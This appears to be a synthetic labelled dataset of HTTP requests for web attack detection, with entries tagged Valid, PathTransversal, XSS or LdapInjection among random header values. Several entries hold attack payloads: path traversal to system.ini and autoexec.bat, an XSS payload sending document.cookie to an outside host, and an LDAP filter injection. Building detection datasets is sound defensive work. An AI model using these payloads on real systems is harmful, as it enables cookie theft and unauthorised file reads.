Pragma: no-cache
Proxy-Authorization: Digest uri=http://4ehieexr.ch/nd0va/aeNco8s.php3
Authorization: sdme mmnaoA=2meI
Range: -192,85376-41938,2-
Referer: http://www.ln1t3ed.fr/ewndee/d3uwjaR/ntkoc/M8I0iDm.asp
TE: trailers,gzip;q=0.1,trailers
Trailer: Trailer
User-Agent: ccciswsade/3.7
UA-CPU: Sparc
UA-Disp: 793,154,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 028x162
Via: HTTP/6.4 www.2aen.jpg:86062, iteqr/1.0 www.lrcnxnod.jpg
Transfer-Encoding: l0tKd; ahtiops=tkdef7n
Upgrade: hoc/9.0, nsaeuh/2.0
Warning: 671 www.dhevPk.tiff "ytaet" "Wed, 23 Dec 09 23:58:59 CET"
X-Forwarded-For: 199.39.79.249
X-Serial-Number: 9258897383132
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29799
Start - Id: 33573
class: Valid
POST /ada9/a4hgzRhw/eO/jstaessunnahnhefubor/ajgCLqP-bP9.nsf? HTTP/1.1
Content-Length: 286
Content-Language: n,ebs8tned
Content-Encoding: deflate
Content-Location: /coba.swf
Content-MD5: YkZudXR1ZG50cGVJbG9lbg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 12 May 05 19:08:02 CET
Last-Modified: Fri, 24 Aug 07 08:19:04 CET
Host: 23.197.49.173
Connection: rdussf
Accept: image/*, video/mpeg;q=0.8, video/*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 241.250.45.10
Cookie: UCprjP=00209;xkn=eIp2GHBOuQ;txeyTn=822710;nxfe=8EnrpB9g;tvtijdiin=ae_5JGnaY_SX
Cookie2: $Version="9"
Date: Sat, 26 Jun 04 23:44:05 CET
ETag: "uDsf.2.VL80DRGjr9J"
Expect: sqej2
From: lishxat@Eern.net
If-Modified-Since: Sun, 07 Nov 04 19:40:04 UTC
If-Unmodified-Since: Mon, 27 Apr 09 24:59:42 CET
If-Match: "ZUeYxA8N1MUba.1"
If-None-Match: "rG8wmo40pWY7a4Js"
If-Range: "v0fo0nWPW.Ea8J6Fi"
Max-Forwards: 9806
MIME-Version: 7.8
Pragma: fhq=N
Proxy-Authorization: 04aage ra4ttt=w2Glsaa
Authorization: Digest uri=http://runtjske.org/ette/doan.mdb
Range: -97,11-
Referer: /hsTt/oenpao.cgi
TE: trailers,chunked,trailers
Trailer: TE
User-Agent: pvtadorT1o
UA-CPU: x86
UA-Disp: 4987,665,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 417x756
Via: 5.7 www.rGsH.htm
Transfer-Encoding: gzip
Upgrade: seaotb/4.9, Cnb/7.8, ikhrhe/2.2
Warning: 661 www.ngtao.tiff "ezebae8kput" 
X-Forwarded-For: 2.111.244.26
X-Serial-Number: 634432406284219
----: -------------
~~~~~: ~~~~~~~~~~~

aBr=t7v6JXaOk&uurrirnweeEtu=uiyepiyi&wterznnzeata6b=hdhtWy7bleatbe&diecIscmlm1stzt=84032&cOhlsdnthwe2t=HrAh9cqittadcr&ZB3ct2y7Dlogx=1processing-instruction&esnmli1e=bn4na-mtrr+tcamdeleteg&05bemilgwlsecR=354631&tE=305731968&avime=elc  6l37aSl&nEnho=rvor3&rgqn=iYFB&etxd4tlke=soh3Jb2X-f

End - Id: 33573
Start - Id: 45322
class: PathTransversal
GET /arod5itaoOhnogNtgt.htm?unitC=1913310&hRtos=oiazaie&nhaieamSdSifu=%28++%27w&pmnSse5=53&tncalrn7to=nqoPZx&KsBodI4Tv=nxeoemsiaetIr++er&yiMmni0nDmtlgk=goie8hlZt4eiks&qete2md40e3lpu=56417618&echoClHY=stylelI&8tde=ihamneFeIeb1oed1c&ioc69wwe6auhI=muon7rosbAaed0rm&gnga1tnn=tFN HTTP/1.1
Host: www.mMayq7eyI.it
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.7
Accept-Encoding: deflate;q=0.6, gzip
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 212.54.201.4
Cookie: otdco=891356;ooLrel=lh r;ydnaVtmpexecvCmB=..\..\..\..\..\..\..\..\..\WINDOWS\system.ini;end=ouek0tysel
Cookie2: $Version="8"
Date: Mon, 24 May 04 12:46:21 UTC
ETag: "ml1wLV8.-apSWJRapayU"
Expect: 100-continue
If-Modified-Since: Mon, 07 Jul 08 03:17:23 UTC
If-Unmodified-Since: Wed, 14 Oct 09 06:07:45 GMT
If-Match: "3sOULy.IKS-DWpffL_F"
If-None-Match: "7fLlfvjPZcLJ3aM"
If-Range: Fri, 10 Jun 05 16:40:49 CET
Max-Forwards: 8421
Pragma: anfrrw='srns'
Proxy-Authorization: Digest algorithm=o0yen
Authorization: uoxhgb sso2gc=rhaands
Referer: http://enpasibr.uk/fchrgtb/trl4/8eole2.fgf
TE: chunked;q=0.2,trailers
User-Agent: Mozilla/1.6 (compatible; MSIE 7.3; Linux i586; seNsedoe)
UA-Color: color8
Via: lyRA/2.0 42.36.143.88
Transfer-Encoding: identity
Upgrade: rfe1hg/1.7, eetls/3.9
Warning: 170 81.43.47.247 "swoUoiepjfENNfou" "Sat, 28 Nov 09 09:49:50 GMT"
X-Serial-Number: 838229
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45322
Start - Id: 16392
class: Valid
GET /ipeveFQq4R8-8Cv4B.msf?0Be92=69225681&jntLf=462768212&@GiformNosUI=hndhwEidireooyo&e8lafhuenr=ear&.vBHh=lwiiamtcifch&GmOXZXvar1ps9=%5BlfCt&tqoklae=rweCdr&LmUS=23 HTTP/1.1
Host: www.dr1aisre.it:80
Connection: keep-alive
Accept: text/*, application/rtf, text/*;q=0.2
Accept-Charset: iso-10646-ucs-2;q=0.0
Accept-Encoding: 
Accept-Language: woasd-eb, 8meoa-pwmAo, eash-Nt5cTc;q=0.9, fsaeZei-f
Cache-Control: no-store
Client-ip: 47.227.109.121
Cookie: aahklwotila=Om;ldiitrstdweo=xjwhn]bou;hrnrsYu=f;r;ku8ht4Imadte=i/ 5n;rpo0n=gdneloeypl1fLn;lw8anonAi=cnatieP
Cookie2: $Version="194"
Date: Tue, 21 Apr 09 16:14:56 CET
ETag: W/"iU@OCIQz7G.@o5g"
Expect: tmfps
From: piRire@gfja0tm2d.be
If-Modified-Since: Tue, 06 Sep 05 12:35:01 CET
If-Unmodified-Since: Thu, 07 Jan 10 12:26:05 GMT
If-Match: *
If-None-Match: "5Pel7WQh5J8aKs@H@"
If-Range: *
Max-Forwards: 607
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: Digest opaque="e9apj"
Authorization: NTLM OWtWb2J0SGFwSUFIbGVsZWdycmt3dTFBNG1lbnN0czl0dA==
Range: 52-425
Referer: http://uiR3gt.gov/te1Aorj/nsOhN/ac3y/acalia.msf
TE: trailers,trailers,trailers
Trailer: From
User-Agent: rtdeo/9.7.0.7
UA-CPU: MIPS
UA-Disp: 227,815,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 9846x663
Via: FTP/8.4 www.2nsngnti.htm, HTTP/8.2 www.tees.tiff
Transfer-Encoding: deflate
Upgrade: Or46/0.2, nsn/5.8, nEiiOe/8.0, Tldds/1.2
Warning: 078 www.eswsl.htm "tepecba9N2eeroese" 
X-Forwarded-For: 35.90.162.224
X-Serial-Number: 5481271353118244328
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16392
Start - Id: 24977
class: Valid
GET /uu5HG6kCtF/e8TQAn7gGEVrvp/zOeopitirQoc/1evalUErVc/hreuer10sm/pan8T/Q6.dll?tOibkpo=ntt&eYxbodySgzA=olR1+tt&8dTte=phaeipo&aar1Otrrhee=155&boeNn=ryoYM&aHrEulsic4=6060&h2hmeu=99323014&wnMntn=1.a2dTMjLXNQ HTTP/1.0
Host: www.Ddehahu.de
Connection: close
Accept: */*
Accept-Charset: windows-1250, iso-8859-3;q=0.6, iso-8859-2, windows-1257;q=0.8, iso-8859-15
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-age=5
Client-ip: 176.214.183.63
Cookie: 4j9UD.E=600001922;tetoi=norkSseohwpj9am;eSedthDeeswse=na1e;ecr9SSodOtrc=wgeti$1ldipnetcate'me/tuad;seohebk=eF3.@5yOX1MU
Cookie2: $Version="6"
Date: Fri, 13 Aug 04 03:05:52 CET
ETag: W/"VBrgZVfjTNwHqdX"
Expect: 100-continue
From: fuMo9@nrmr.net
If-Modified-Since: Sun, 24 Jan 10 15:24:12 GMT
If-Unmodified-Since: Sun, 11 Apr 10 24:34:46 UTC
If-Match: *
If-None-Match: "D7X1Y6pAGCAmYbN"
If-Range: "0iP1qD4fazm_h5sd"
Max-Forwards: 29
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: n39Msi agpv8i=to9rstt
Authorization: NTLM bWV0dHFpMWlxeG5hdkV0dWlNdHRudGV5cmRrMmV1YWVhdA==
Range: -67,790189-2941
Referer: http://n6dretj.uk/adeq/Et0Eisre/eehrhen9/esndoa.pdf
TE: trailers,chunked;q=0.8
Trailer: If-Range
User-Agent: Mozilla/1.4 (compatible; MSIE 4.8; Mac OS X; itto6zA)
UA-CPU: StrongARM
UA-Disp: 7088,5005,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 4782x136
Via: 3.3 www.cet4.jpeg, 4.9 www.d3isl5rs.tiff:32181
Transfer-Encoding: compress
Upgrade: hae/6.6, tnaNlo/3.6, ro4r/5.9
Warning: 586 www.xoesS.jpg "tereeuOoER" "Sun, 31 Oct 04 12:03:58 GMT"
X-Forwarded-For: 212.148.33.104
X-Serial-Number: 95297719813252220889
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24977
Start - Id: 46021
class: PathTransversal
POST /url1Neh5csmnwah/dbceIlJL/Xsock_streamN4Vz97KhSm/h52TRCDh/sCzZMmyf/rKD-p/Ticaaonatand/S481aec/CSZ/s..xun.jpg? HTTP/1.1
Content-Length: 306
Content-Language: marr0Afd,sssaqmop
Content-Encoding: gzip
Content-Location: /s7ua.tar.gz
Content-MD5: b2l3ZXVsU0lqdWZ3b29idA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 28 Jun 06 03:09:02 UTC
Last-Modified: Sat, 25 Apr 09 08:20:38 CET
Host: www.hfrunlhd.cz
Connection: keep-alive
Accept: image/jpeg, image/jpeg;q=0.9, image/jpeg;q=0.5
Accept-Charset: utf-7;q=0.2, iso-8859-4, iso-2022-kr;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: max-age=003
Client-ip: 110.54.124.198
Cookie: uuthl1ir1veeeer=tre;aiHaFbya=ngncusrtlocationt8p;rvvfw=../../../../../../../../../WINNT/autoexec.bat;@V_JQstyleWBk=emiylw5(;dXyW6o=sO+ia/;Y9m3Ke8gvarWVU=430
Date: Thu, 31 Jul 08 11:13:19 UTC
Expect: nenTinf=oiot;tc8mks7s
If-Modified-Since: Fri, 14 Nov 08 16:39:16 UTC
If-Match: *
If-None-Match: *
If-Range: "r@PTo3zDIlIP-fUF"
Max-Forwards: 379
Pragma: jsrGl='it'
Authorization: Digest algorithm=aeiyq1
Referer: http://www.mlmtsie.st/niyt/ht4ou/toleeh/i2nitdtM/wttn.doc
User-Agent: Mozilla/6.1 (Windows; U; Win 9x 1.9; 4q-nl; rv:8.9.5) Gecko/62488622
UA-OS: Win98
Via: 3.4 www.Ssr6ael.css
Transfer-Encoding: compress
Warning: 826 www.pMoo.shtml:19413 "rnoled" "Thu, 01 Dec 05 20:40:53 UTC"
X-Serial-Number: 8566384
----: ---------------------------------

zr9uctz4csw=265894&MCFKOv=d1pef&tnfdNhonerke=54&btbnen0in=1560&EIniuiioise=83633&09KyK5KJrcpYf=toxjjssd0&mieCairoifo=rPz1cJX-&e3nGEewindow.openprocessing-instructionG=8_KkvI&homeWWFr=Dxai6&f4hpnNet=p&eotuOga7y=isnhsiaaltb&ozeldeooseit8s=3&nkeadusrq=elrD&6eef7sea=9ervmamqmu&BXEDCeykY8lP=E6 vbscriptx@enas

End - Id: 46021
Start - Id: 8921
class: Valid
GET /.BIu8n9BZgf/V@2qpTP/uengwhejlw5ei/tmdwUeihrTcdf/itilyuzlnlczoiaulsa/5kigPDrwluhlde.nsf?OKOxB7CbNrzT=ogsgucar0a&fraxcfese=r1eNzIjg8iJ&zroEsF=Cotm HTTP/1.0
Host: 108.81.166.31:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: shift_jis, shift_jis;q=0.6, gb2312;q=0.2, cp-932
Accept-Encoding: identity;q=0.0, deflate;q=0.1, deflate;q=0.8, identity;q=0.3, deflate
Accept-Language: *;q=0.3
Cache-Control: min-fresh=04
Client-ip: 94.217.250.252
Cookie: ad=sNf49InHUaaB
Cookie2: $Version="266"
Date: Mon, 25 Jun 07 16:43:42 UTC
ETag: W/"0G_KBsgPyDnxx8Lf"
Expect: 100-continue
From: gyture4e@b1eUnPsa.de
If-Modified-Since: Fri, 16 Jul 04 16:51:12 CET
If-Unmodified-Since: Fri, 08 Jun 07 11:17:02 GMT
If-Match: "9ift269akb3QKPMeG"
If-None-Match: *
If-Range: Wed, 06 Jul 05 10:21:56 GMT
Max-Forwards: 660
MIME-Version: 1.1
Pragma: eLb=ielcei
Proxy-Authorization: Basic cm9kMGhuMjpvYUl5enZvaA==
Authorization: Basic MXREeWl0YWg6aWFlOA==
Range: 7-3572
Referer: /S1RnOqhs/Dpid/tets.php4
TE: chunked;q=0.7
Trailer: Cache-Control
User-Agent: r0h3ns9ast (qYL3W8p.; b3tdbaI; e4_-7tzF; mV62uVP; rkESogLeq)
UA-CPU: 68000
UA-Disp: 065,7616,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 3660x726
Via: 2.8 www.aryK0oda.tiff
Transfer-Encoding: fteonn; o9tee=roTNnf
Upgrade: D54Tc/5.2
Warning: 831 www.ibia3otE.html "oosrinefTwhigssstnI" "Tue, 26 Jan 10 08:02:32 CET"
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 010709448680546
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8921
Start - Id: 30611
class: Valid
GET /Mm2sooe6s/ec0rofCina6/nxU/W8wfZincluden6SH_/aEiouan/ekSUjPUUEzbTZaU8@Cg/7co28WS7DNmnetcat/xcLtz/t8Zhl8bYVQ9/srjmiu/dsN.mspx?ls=wesa&ASaWstdin2yiframeKc=%28alm&Do4Igh=elTi%5Dw&meh=dxp_nofjEsga&6bRNW=Kvarofhue+4o&bL0pF25HK=02&O.libULMr1=iiAj%3F0Llike%7Ea+va%288%7Ent HTTP/1.1
Host: www.i6efaee.uk:3
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: yawz='mN'
Client-ip: 129.82.35.213
Cookie: tkrertiti0th=91;4nle=t/e2e
Cookie2: $Version="22"
Date: Thu, 29 Sep 05 06:59:53 CET
ETag: "uEKerDwoqmz6sHaF"
Expect: hann
From: ewemen@Ld96ee.de
If-Modified-Since: Fri, 22 Apr 05 07:02:45 CET
If-Unmodified-Since: Thu, 24 Aug 06 11:25:52 GMT
If-Match: *
If-None-Match: "G3he3fd66C6JK-uY"
If-Range: "94dBbbhWXn2.qLXZk1aA"
Max-Forwards: 50
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: ro3tm esa4ehee=afee4
Range: -44,-9596,885-03597
Referer: /kGvtiar/de8a/edE5ual/1hqW/pejonp.jpg
TE: deflate,gzip;q=0.9,trailers
Trailer: Expect
User-Agent: Mozilla/8.2 (X11; U; Linux i386 8.9; sP-d7; rv:1.0.6) Gecko/11102923
UA-CPU: StrongARM
UA-Disp: 436,0901,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 9301x810
Via: FTP/2.8 www.cdbe.gif
Transfer-Encoding: identity
Upgrade: r2h/2.9
Warning: 036 www.4tognA.html "Tttoenhio9nolunani" "Sat, 24 Oct 09 24:15:22 GMT"
X-Forwarded-For: 147.151.22.151
X-Serial-Number: 79914989141850023
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30611
Start - Id: 31066
class: Valid
GET /dogFof/aNu0Nx4YG5AsRQ/enelsEndmdh/..Ylogx@r3ap.shtml?oUmafesEoilizP=uhltara6na&eeGohtt=klt&l0aliuj=04184&tys6f52dIeEi=vnrpE HTTP/1.0
Host: 32.209.132.5
Connection: close
Accept: application/postscript, image/*
Accept-Charset: x-mac-korean, iso-8859-1;q=0.8, euc-cn;q=0.7, x-mac-hebrew;q=0.7, euc-kr;q=0.1
Accept-Encoding: deflate, compress
Accept-Language: 1ae-xo5s9U, oaoch-gAihto;q=0.7
Cache-Control: no-transform
Client-ip: 13.189.196.53
Cookie: Tr=u3pb;ispyri=fmb;iebig=IS;NallobjectnullH7ef=scriptidqy;riigmjyroJq=speunCage2hhNe;ssayao=c6
Cookie2: $Version="69"
Date: Mon, 02 Jan 06 02:28:30 UTC
ETag: W/"UHmlLqgMwHtvrSN"
Expect: imamsYsm
From: tyfhs@svdrsronma.st
If-Modified-Since: Sun, 16 Oct 05 11:50:14 GMT
If-Unmodified-Since: Thu, 08 Jan 04 21:17:25 GMT
If-Match: "j8UOuU2asrHKBQDFhF7"
If-None-Match: "ODQe2XECcIV7dxtOa2SO"
If-Range: Sat, 27 Aug 05 01:14:19 UTC
Max-Forwards: 97
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Basic VHI2c2lkOnRsZTU2NDU=
Authorization: Basic d3Jobzo1b2lkYw==
Range: 9-,-547,201167-8758
Referer: http://www.iekt35.ch/beiody/ndely/eMNpo/seIa/psws.htm
TE: trailers,trailers,gzip;q=0.9
Trailer: Accept-Encoding
User-Agent: Mozilla/9.2 (Windows; U; Win98 1.1; ma-No; rv:9.4.9) Gecko/74747799
UA-CPU: 68000
UA-Disp: 7666,0977,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 295x182
Via: 0.5 79.201.144.251, 1.8 www.oouoe.js
Transfer-Encoding: deflate
Upgrade: hme/3.6, eGif/4.2, 3ai/5.4, iFpet/8.3
Warning: 836 www.egnAek.shtml:406 "erkeES8uldsfsrytaIhi" "Sun, 28 Aug 05 15:14:21 CET"
X-Forwarded-For: 77.155.203.24
X-Serial-Number: 0797621
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31066
Start - Id: 9301
class: Valid
GET /e.Ir.oe9OtyaV3Gpf/b0qorf.BM1/dd-ZfWViHuGV/1s6/eis4W5rno1zeeSR75qm/pp9BxSyhf_fKU.jpg? HTTP/1.0
Host: 25.9.75.48
Connection: close
Accept: */*;q=0.6
Accept-Charset: x-mac-korean;q=0.5, cp-936, x-mac-roman;q=0.9, koi8-r;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 251.194.212.34
Cookie: ojf2Cezes=aah;tolmhaLNuk=@rt
Cookie2: $Version="974"
Date: Wed, 04 May 05 21:34:45 CET
ETag: W/"N9MJ3LQgA0sfWuXi6C"
Expect: ioNoeo8=eeal4p;aInicoae
From: clbdsbE@ouRcuroAt.it
If-Modified-Since: Thu, 28 Sep 06 14:30:41 CET
If-Unmodified-Since: Sat, 21 Jun 08 21:01:09 GMT
If-Match: "suPb-HYcxW6Zqb6siTp"
If-None-Match: "KL@2uYllMN5J@jDr7X"
If-Range: Wed, 30 Jun 04 09:40:21 GMT
Max-Forwards: 861
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM aXNyb3RvbXRhbWdtbXJhZWRydXd0WWtldHRodXBhbm15ZWFvemVjcnJoTw==
Authorization: Digest response="aaB86aa345749fAb3ede85c42AAdDeA6"
Range: 53-
Referer: /9Afda/opieelf/4Angi/dm4u/a1abrn.php4
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: zTuanva/0.3.7.6
UA-CPU: 68000
UA-Disp: 7621,4110,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6875x133
Via: 6.4 43.72.96.205, r9aa/9.2 227.10.1.107:001
Transfer-Encoding: aoicit
Upgrade: ueprv/4.7, i56h/1.4, oe9/5.3, oriti/8.3, xugrra/6.0
Warning: 018 www.Ssi76p.jpeg "nedenrH9ew0rrmthew" "Thu, 13 Sep 07 15:26:18 CET"
X-Forwarded-For: 156.126.164.181
X-Serial-Number: 378312956268
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9301
Start - Id: 46592
class: XSS
GET /e22-4bNHXAtxG/9unbL0oUu_stdin_kvV/jTnadtoydtpvogphn/sQkXT7lSCMv7E/hRquVOa@Nq2DMq81Bm.cgi?gm0rtdestsg1s=8&Fd58ielheare=ymn&vEjN6XZk0boot.ini=ps&nntaHrhsrd=46719273&eon=cILwCGmbY.ST&tarsl=1 HTTP/1.0
Host: 192.250.120.144
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1250;q=0.8, x-mac-chinesetrad, x-mac-korean;q=0.4, iso-8859-8
Accept-Encoding: 
Accept-Language: <body onload=    "    [document.location.replace ('http://www.asngan.com/cgi-bin/atchalon.cgi'+document.cookie);]    "   >
Cache-Control: min-fresh=24
Client-ip: 242.106.13.229
Cookie: s1iudij=t<[dnuraccept
Cookie2: $Version="0"
Date: Wed, 10 Jun 09 19:21:54 CET
ETag: "XFff9F2kkW70dfSTqAV"
Expect: 100-continue
From: eoshsh@qisp7eg.org
If-Modified-Since: Wed, 06 Jun 07 10:31:13 CET
If-Unmodified-Since: Tue, 03 Nov 09 20:23:31 CET
If-Match: "kGVwsQsnD__LNfzUUNY"
If-None-Match: "zlI41l.G_aLnNII"
If-Range: Fri, 06 May 05 03:43:51 CET
Max-Forwards: 64
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: so7n seEgteed=c5edme
Authorization: Basic Z3RLdGJkOnN1cGFl
Range: -2,441595-
Referer: /hfteo/otosnu/Rrfe.rar
TE: chunked;q=0.2,trailers,trailers
Trailer: Max-Forwards
User-Agent: s4trkrne/6.3.9.1.9
UA-CPU: Sparc
UA-Disp: 1938,517,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 991x9240
Via: 7.6 166.187.3.255, 2.0 83.95.171.243, h3E/3.5 201.201.141.93:2082
Transfer-Encoding: compress
Upgrade: Sclxk9/4.9, M9s8r/4.0, 1pr/8.7, eh6/3.6, stmem/0.6
Warning: 051 74.151.102.193 "tps9iyOEh" 
X-Forwarded-For: 219.165.16.16
X-Serial-Number: 015353495234
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46592
Start - Id: 8856
class: Valid
GET /aergsrpet/td1yssn/FyL8bH-Y/e1ndtaooinknysO/pZF6I2nxP/echod8Xbh.msf?lgbiIdNaqtkxhs=nPV&heidoepaceqey=u5ti&iframehlRrsBaHBV=9&aratxsee=177415&gjUl=oree%3Aadb&rt8poydrc=tmperoeaccept9abasdl&o8rdc=+system9o&PQpye=sid+OEni HTTP/1.0
Host: www.8aaa70n.com
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: koi8, x-mac-greek, utf-7, ks_c_5601-1987, windows-1252;q=0.1
Accept-Encoding: deflate;q=0.3
Accept-Language: *
Cache-Control: d4i='tsh6t'
Client-ip: 73.159.234.63
Cookie: ke=0ntpsstyle un)7eTu shutdown;h6oyjpwpgE=thyEepo4jaIimhtr;eunli7rwztHr=lDgds1eiraJrl;w0eesboxmteiras=76453
Cookie2: $Version="67"
Date: Tue, 07 Oct 08 03:46:36 CET
ETag: W/"pXSCo35tRrXsat."
Expect: 100-continue
From: nnsIg@cmoeufg.uk
If-Modified-Since: Sat, 10 Nov 07 14:29:37 CET
If-Unmodified-Since: Fri, 21 Dec 07 10:36:56 CET
If-Match: *
If-None-Match: *
If-Range: "yrh.4q0812bsXRB"
Max-Forwards: 284
MIME-Version: 1.5
Pragma: af='wt'
Proxy-Authorization: Digest cnonce="locenctt"
Authorization: NTLM cXdzaE14aWhjT21oeW5OYmhtZUFhZHRlaGhvaVRnbnR6c1Q0bWU3aHNv
Range: 7-
Referer: http://www.rttwiie.ch/asslasda/htam5tt/Iyta.nsf
TE: deflate;q=0.8
Trailer: Max-Forwards
User-Agent: mKjCotRn http://www.ieiM.be
UA-CPU: StrongARM
UA-Disp: 909,1237,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 108x715
Via: FTP/5.9 22.185.17.144, HTTP/3.8 34.96.149.14
Transfer-Encoding: identity
Upgrade: it9o/7.8, e4esfs/7.3, Csos/8.4
Warning: 091 www.bqal5R.jpg "tAj9t" 
X-Forwarded-For: 160.159.126.87
X-Serial-Number: 56388963279118
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8856
Start - Id: 27641
class: Valid
GET /z_/xkvAL9k/BKDk/mbK_q/8Ot7dsdA8boo/tcvhlsock_streamHoZuN/edmTlooafo/yiRcd/an_telnetdMl4mocha/tS6pD0BFufUdr3/so4iaahu.bin?iBaffimfa9tw=mk7oz&temoilq=0dn&mIrad6Ectntn=ep1htzctapNhyUdi&gijs5c6Td=08838163&u8neyTnEsRiiw=iDdtY6V_bb HTTP/1.1
Host: www.ilrnwdm5ci.st
Connection: lEtalae
Accept: video/*;q=0.5, video/*;q=0.7
Accept-Charset: x-mac-roman, x-mac-chinesesimp, x-mac-japanese, x-mac-cyrillic
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: max-age=8
Client-ip: 249.193.66.99
Cookie: kdedhsynlgel=eetyishy;tiJnhapc=stu;ttHeuwi29seEcu=mt7rbalon;szeodl7pFe=lYg;MXq4=930939
Cookie2: $Version="8"
Date: Sat, 10 Nov 07 04:46:08 UTC
ETag: W/"Q7FDirU-IyamM8-k"
Expect: 100-continue
From: Rofmod@oeornsCta.de
If-Modified-Since: Thu, 07 Aug 08 13:11:12 CET
If-Unmodified-Since: Fri, 13 Mar 09 10:47:41 CET
If-Match: "R3Ek3qGJkm7o3AV"
If-None-Match: *
If-Range: *
Max-Forwards: 98
MIME-Version: 0.1
Pragma: clrnrs=qs
Proxy-Authorization: Basic TmVyRXQ6ejdUOQ==
Authorization: Digest uri=/qcikst/neagegd/eeos2gt3/asi8i.gif
Range: -88
Referer: /g2Sf6Z/mest/IIacyel/uoealo/ds2tA.mdb
TE: chunked;q=0.8,chunked
Trailer: Via
User-Agent: ohH1u3pMT4 http://www.natnl5fq.st
UA-CPU: x86
UA-Disp: 368,095,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 0807x3166
Via: 6.9 249.170.231.74:89, cnak/2.7 www.ilxiwsv.css, FTP/8.8 www.wofbel.jpeg:7
Transfer-Encoding: compress
Upgrade: n5eeiS/7.2
Warning: 259 www.rfDsn.jpg "ohSzyAnhwspipbdtmo" "Tue, 28 Jun 05 14:35:35 GMT"
X-Forwarded-For: 21.17.8.118
X-Serial-Number: 189697977036477
----: ----------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 27641
Start - Id: 37280
class: LdapInjection
POST /swOmzP/E.mH/insertnZjaccept1.vJ-DY9/ljoOaetejwwvcrismw.swf? HTTP/1.0
Content-Length: 241
Content-Language: s09ranmr,ssi,sTam
Content-Encoding: compress
Content-Location: http://www.apnkg1ii.de/m3aleEtn/owont.jpg
Content-MD5: YWlwc2FlcnQwZXVjcGF1ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 20 Jul 04 16:06:40 GMT
Last-Modified: Sun, 01 Jul 07 22:21:54 CET
Host: 0.13.107.156
Connection: close
Accept: image/gif;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: 7671)(&(objectClass=Nol)(|(sn=ebo)(cn=t   J*))
Accept-Language: lonx8-y, EIwN-ahioty;q=0.2, Ujr42rn3-ormn
Cache-Control: no-store
Client-ip: 25.97.10.82
Cookie: 80r7nzuealtdbu=cnetb(oyvareiframefa;ez8c=bOniidacusfokeHtiN;heoqhwyxxfoa1e=homebtifrs dek;a7t=0Teu0;lreoegT8teaxoON=sbtDEfz2Sbh
Cookie2: $Version="4"
Date: Sat, 31 May 08 06:19:03 UTC
ETag: "yuh2sJ9LeKM1-CyOmz3"
Expect: 100-continue
From: uAoeEcF@bauipcb2x.fr
If-Modified-Since: Tue, 02 Nov 04 05:16:04 UTC
If-Match: "m-bNPi9tqD9qSf7vIg"
If-None-Match: "4jbDnZOHPA3X_Nem0"
If-Range: "FJhG62oiZNWFtJwvyH5"
Max-Forwards: 93
MIME-Version: 1.3
Pragma: sautY6e='apoo'
Proxy-Authorization: h0o5 os2gn=erur0
Authorization: plchry nort=njtshs
Referer: http://www.7grmerh.uk/xtst.mpeg
TE: trailers
Trailer: TE
User-Agent: hHQiiVgd (a_3qS1eaW; zrG9Fn2; hb9tO2wuEj; xq43Fo; rc-QJe.)
UA-Disp: 2933,1211,32
Via: 3.2 50.250.113.169, 3.0 10.74.206.105
Warning: 883 www.fRose.tiff "esne" "Sun, 08 Jun 08 18:40:43 UTC"
X-Forwarded-For: 62.116.110.58
X-Serial-Number: 037823

